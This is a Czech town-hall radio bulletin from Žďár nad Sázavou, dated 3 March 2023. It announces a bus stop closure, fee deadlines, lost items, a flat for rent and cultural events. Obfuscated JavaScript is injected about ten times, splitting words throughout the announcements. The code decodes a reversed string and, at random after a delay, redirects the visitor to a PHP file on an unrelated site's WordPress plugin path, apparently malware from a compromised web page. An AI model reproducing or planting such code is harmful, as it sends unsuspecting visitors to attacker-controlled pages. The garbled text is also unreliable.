Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 3. března 2023

Pátek, 3. března 2023

Z ÚŘADU:

Odbor komunálních služeb oznamuje, že v souvislosti s úplnou uzavírkou ulice Jamská bude od pondělí 6. března 2023 do 30. dubna 2024 včetně zrušena bez náhrady zastávka MHD Novoměstská pro linku č. 3.

Vedení MHD:

– linka č. 3 bude vedena přes propojku ulic Novoměstská a Jamská v nové průmyslové zóně, nejbližší zastávka je Neumannova. Děkujeme za pochopení.

Odbor majetkoprávní upozorňuje na úhradu nájemného za rok 2023 za pronájem pozemků ve vlastnictví města Žďáru nad Sázavou pod řadovými Prefa garážemi a za zahrádky u by$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových domů, které je splatné každoročně vždy do 31. března na účet města Žďáru nad Sázavou s uvedením variabilního symbolu a jména nájemce a adresy bydliště. Úhradu je možno zaplatit také na pokladně MěÚ v ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovosti nebo platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. Případné dotazy a informace poskytne Marie Dvořáková, tel. 566688171.

Upozorňujeme držitele psů, že se blíží splatnost poplatku, který má být uhrazen do 31. března. Poplatek můžete uhradit bankovním převodem na účet města pod přiděleným variabilním symbolem, nebo ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tově na pokladně městského úřadu. Úhradu lze provést i platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. 

Bližší informace poskytne Miroslava Zachová na tel. čísle 566 688 147 nebo jsou k dispozici na webových stránkách města. 

Odbor komunálních služeb oznamuje, že v případě zájmu o platbu poplatku za komunální odpad SIPEM, je třeba vyplnit formulář anebo kontak$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovat odbor komunálních služeb nejdéle však do 10. března 2023.

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány svazky klíčů, látkový tunel a taška + osobní věci bez dokladů, řidičský průkaz a pánská mikina. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

 

VYHLÁŠENÉ ZÁMĚRY:

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou vyhlašuje záměr na pronájem nemovi$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti č. p. 451, na ulici Smíchov č. or. 8 ve Žďáře nad Sázavou 1. Nemovi$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tost se skládá ze tří pokojů + kuchyňského koutu + příslušenství. Nájemné je stanoveno ve výši 7.188,30 Kč/měsíc + zálohy na služby s nájmem bytu  spojené. Uzávěrka záměru je 16. března 2023.

 

KULTURNÍ POZVÁNKY:

V Regionálním muzeu na Tvrzi probíhá do 24. dubna 2023 výstava Retrohrátky. K vidění budou hračky éry socialismu a také interaktivní dětská herna. Uvidíte například Rubikovu kostku, plechovou berušku na klíček nebo céčka a některé věci si budete moct i vyzkoušet. Více informací najdete na webu muzea www.muzeumzdar.cz nebo na Facebooku.

Po celý březen probíhá v Knihovně Matěje Josefa Sychry celostátní akce Březen – měsíc čtenářů. Pro návštěvníky jsou připraveny besedy se spisovateli, tvůrčí dílna, tradiční Josefská noc i Noc s Andersenem.